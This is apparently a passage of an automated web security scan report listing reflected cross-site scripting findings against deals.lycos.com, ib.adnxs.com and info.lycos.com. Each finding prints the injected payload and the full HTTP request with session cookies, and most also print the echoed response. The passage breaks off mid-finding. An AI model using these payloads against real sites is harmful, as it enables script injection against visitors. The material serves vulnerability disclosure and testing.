P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:14 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46586

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;b1636"style="x:expression(alert(1))"804d8716915=1">
...[SNIP]...

3.43. http://deals.lycos.com/deals/category/televisions-159 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/televisions-159

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25137"style%3d"x%3aexpression(alert(1))"bca27b4183 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 25137"style="x:expression(alert(1))"bca27b4183 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/televisions-159?25137"style%3d"x%3aexpression(alert(1))"bca27b4183=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:24 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;25137"style="x:expression(alert(1))"bca27b4183=1">
...[SNIP]...

3.44. http://deals.lycos.com/deals/category/travel-and-entertainment-206 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/travel-and-entertainment-206

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23e36"style%3d"x%3aexpression(alert(1))"b5dbc63acb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 23e36"style="x:expression(alert(1))"b5dbc63acb4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/travel-and-entertainment-206?23e36"style%3d"x%3aexpression(alert(1))"b5dbc63acb4=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:17 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;23e36"style="x:expression(alert(1))"b5dbc63acb4=1">
...[SNIP]...

3.45. http://deals.lycos.com/deals/stores/best-buy-560 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/best-buy-560

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9585"style%3d"x%3aexpression(alert(1))"08d8944c63d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d9585"style="x:expression(alert(1))"08d8944c63d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/stores/best-buy-560?d9585"style%3d"x%3aexpression(alert(1))"08d8944c63d=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:10 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;d9585"style="x:expression(alert(1))"08d8944c63d=1">
...[SNIP]...

3.46. http://deals.lycos.com/deals/stores/buy-com-233 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/buy-com-233

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e75fd"style%3d"x%3aexpression(alert(1))"3e066d15b13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e75fd"style="x:expression(alert(1))"3e066d15b13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/stores/buy-com-233?e75fd"style%3d"x%3aexpression(alert(1))"3e066d15b13=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:28 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46949

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;e75fd"style="x:expression(alert(1))"3e066d15b13=1">
...[SNIP]...

3.47. http://deals.lycos.com/deals/stores/dell-home-638 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/dell-home-638

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61e95"style%3d"x%3aexpression(alert(1))"a787e8b7cfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 61e95"style="x:expression(alert(1))"a787e8b7cfe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/stores/dell-home-638?61e95"style%3d"x%3aexpression(alert(1))"a787e8b7cfe=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:11 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;61e95"style="x:expression(alert(1))"a787e8b7cfe=1">
...[SNIP]...

3.48. http://deals.lycos.com/deals/stores/ebay-50 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/ebay-50

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf14a"style%3d"x%3aexpression(alert(1))"366512bb10b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf14a"style="x:expression(alert(1))"366512bb10b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/stores/ebay-50?bf14a"style%3d"x%3aexpression(alert(1))"366512bb10b=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:06 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;bf14a"style="x:expression(alert(1))"366512bb10b=1">
...[SNIP]...

3.49. http://deals.lycos.com/deals/stores/itunes-music-store-1414 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/itunes-music-store-1414

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13c84"style%3d"x%3aexpression(alert(1))"9dccb822702 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 13c84"style="x:expression(alert(1))"9dccb822702 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/stores/itunes-music-store-1414?13c84"style%3d"x%3aexpression(alert(1))"9dccb822702=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:13 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44865

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;13c84"style="x:expression(alert(1))"9dccb822702=1">
...[SNIP]...

3.50. http://deals.lycos.com/deals/stores/walmart-321 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/walmart-321

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0561"style%3d"x%3aexpression(alert(1))"97f7932e4ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a0561"style="x:expression(alert(1))"97f7932e4ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/stores/walmart-321?a0561"style%3d"x%3aexpression(alert(1))"97f7932e4ff=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:46 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:46 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;a0561"style="x:expression(alert(1))"97f7932e4ff=1">
...[SNIP]...

3.51. http://ib.adnxs.com/ptj [redir parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a5a5'%3balert(1)//7777e16fd16 was submitted in the redir parameter. This input was echoed as 4a5a5';alert(1)//7777e16fd16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ptj?member=311&inv_code=cm.idg_b2c&size=728x90&referrer=http%3A%2F%2Fshopping.lycos.com%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.idg_b2c%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-6268295_1292163909%2C%2Cshop%2C%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Bord1%3D980870%3Bcontx%3Dshop%3Ban%3D{PRICEBUCKET}%3Bdc%3Dd%3Bbtg%3D%3Bord%3D5266572%3F4a5a5'%3balert(1)//7777e16fd16 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://shopping.lycos.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid2=1253520181866309356; icu=EAAYAA..; acb244106=5_[r^kI/7ZI!97E0nf8MG#ngg?enc=AAAAgJF74D-amZkZOavdPwAAAKCZmQlAmpmZGTmr3T8AAACAkXvgP4AtEUe-YV1k7KbsxvZlZREt2wRNAAAAALk6AwA3AQAAZAAAAAIAAADQvgEAAQAAAFVTRABVU0QA2AJaAKoBAABqBwICBQIFAAAAAADrHzp9&tt_code=cm.idg_b2c&udj=uf%28%27a%27%2C+27%2C+1292163885%29%3Buf%28%27r%27%2C+114384%2C+1292163885%29%3Bppv%2882%2C+%277232044046490873216%27%2C+1292163885%2C+1302531885%2C+17328%2C+21790%29%3Bppv%2884%2C+%277232044046490873216%27%2C+1292163885%2C+1302531885%2C+17328%2C+21790%29%3Bppv%2811%2C+%277232044046490873216%27%2C+1292163885%2C+1302531885%2C+17328%2C+21790%29%3Bppv%2882%2C+%277232044046490873216%27%2C+1292163885%2C+1302531885%2C+17328%2C+21790%29%3Bppv%2884%2C+%277232044046490873216%27%2C+1292163885%2C+1302531885%2C+17328%2C+21790%29%3Bppv%2887%2C+%277232044046490873216%27%2C+1292163885%2C+1292250285%2C+17328%2C+21790%29%3Bppv%28619%2C+%277232044046490873216%27%2C+1292163885%2C+1292250285%2C+17328%2C+21790%29%3Bppv%28620%2C+%277232044046490873216%27%2C+1292163885%2C+1292250285%2C+17328%2C+21790%29%3Bppv%28621%2C+%277232044046490873216%27%2C+1292163885%2C+1292250285%2C+17328%2C+21790%29%3B&cnd=!QE6xsQiwhwEQ0P0GGJRvIJ6qASgAMfylRX2Se-A_QhMIABAAGAAgASj-__________8BQhMICxAAGAAgAyj-__________8BQgwIUhD89iMYBCADKAJCEwhTEAAYACACKP7__________wFCDAhUEJ35GhgGIAMoAkITCFUQABgAIAIo_v__________AUITCFYQABgAIAIo_v__________AUITCFcQABgAIAMo_v__________AUgDUABYqgM.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E17328; sess=1; anj=Kfu=8fG4S]fQCe7?0P(*AuB-u**g1:XIF3ZUMbNTSHJTy]F]k($WNwJP'.<5sLEKRldcpNp)Ec(kJ6st'z3Uv2?!F?0<:.kuRsX$mCQui>4M`J`y*aOn9LJHv?jDa''Df?dw]@K3NPeORWrK5v*s0045+'v.Jg1BCTjbtb.(7Yo>`<xZkofNI5StD5bqM=kN.BbMwKNO7wJ?G+_W?^@>wr?4/0viQZwz3N4Erbd<u$`O`Fg>TW*rP!?5iWVO-@k

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 13-Dec-2010 14:28:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb244106=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Sat, 12-Mar-2011 14:28:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb7262=5_[r^kI/7ZI!97E0nf8M>yz4N?enc=AAAAgJF74D-amZkZOavdPwAAAKCZmQlAmpmZGTmr3T8AAACAkXvgPwols7zZIRBB7KbsxvZlZREU3ARNAAAAALk6AwA3AQAAZAAAAAIAAADQvgEAAQAAAFVTRABVU0QA2AJaAKoBAABqBwICBQIFAAAAAADXH3V5&tt_code=cm.idg_b2c&udj=uf%28%27a%27%2C+27%2C+1292164116%29%3Buf%28%27r%27%2C+114384%2C+1292164116%29%3Bppv%2882%2C+%274688284431150163210%27%2C+1292164116%2C+1302532116%2C+17328%2C+21790%29%3Bppv%2884%2C+%274688284431150163210%27%2C+1292164116%2C+1302532116%2C+17328%2C+21790%29%3Bppv%2811%2C+%274688284431150163210%27%2C+1292164116%2C+1302532116%2C+17328%2C+21790%29%3Bppv%2882%2C+%274688284431150163210%27%2C+1292164116%2C+1302532116%2C+17328%2C+21790%29%3Bppv%2884%2C+%274688284431150163210%27%2C+1292164116%2C+1302532116%2C+17328%2C+21790%29%3Bppv%2887%2C+%274688284431150163210%27%2C+1292164116%2C+1292250516%2C+17328%2C+21790%29%3Bppv%28619%2C+%274688284431150163210%27%2C+1292164116%2C+1292250516%2C+17328%2C+21790%29%3Bppv%28620%2C+%274688284431150163210%27%2C+1292164116%2C+1292250516%2C+17328%2C+21790%29%3Bppv%28621%2C+%274688284431150163210%27%2C+1292164116%2C+1292250516%2C+17328%2C+21790%29%3B&cnd=!QE6xsQiwhwEQ0P0GGJRvIJ6qASgAMfylRX2Se-A_QhMIABAAGAAgASj-__________8BQhMICxAAGAAgAyj-__________8BQgwIUhD89iMYBCADKAJCEwhTEAAYACACKP7__________wFCDAhUEJ35GhgGIAMoAkITCFUQABgAIAIo_v__________AUITCFYQABgAIAIo_v__________AUITCFcQABgAIAMo_v__________AUgDUABYqgM.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E17328; path=/; expires=Mon, 13-Dec-2010 14:28:36 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sun, 12 Dec 2010 14:28:36 GMT
Content-Length: 365

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.idg_b2c/;net=cm;u=,cm-6268295_1292163909,,shop,;;cmw=owl;sz=728x90;net=cm;ord1=980870;contx=shop;an=40;dc=d;btg=;ord=5266572?4a5a5';alert(1)//7777e16fd16">
...[SNIP]...

3.52. http://info.lycos.com/ [cat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c59d"><script>alert(1)</script>b1e138b458a was submitted in the cat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?tab=multi&cat=images9c59d"><script>alert(1)</script>b1e138b458a HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:05 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info</title
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_images9c59d"><script>alert(1)</script>b1e138b458a&amp;utm_campaign=home_mail&amp;utm_medium=networkbar">
...[SNIP]...

3.53. http://info.lycos.com/ [tab parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://info.lycos.com
Path:   /

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a4a7"><script>alert(1)</script>abc7cf3bcbf was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

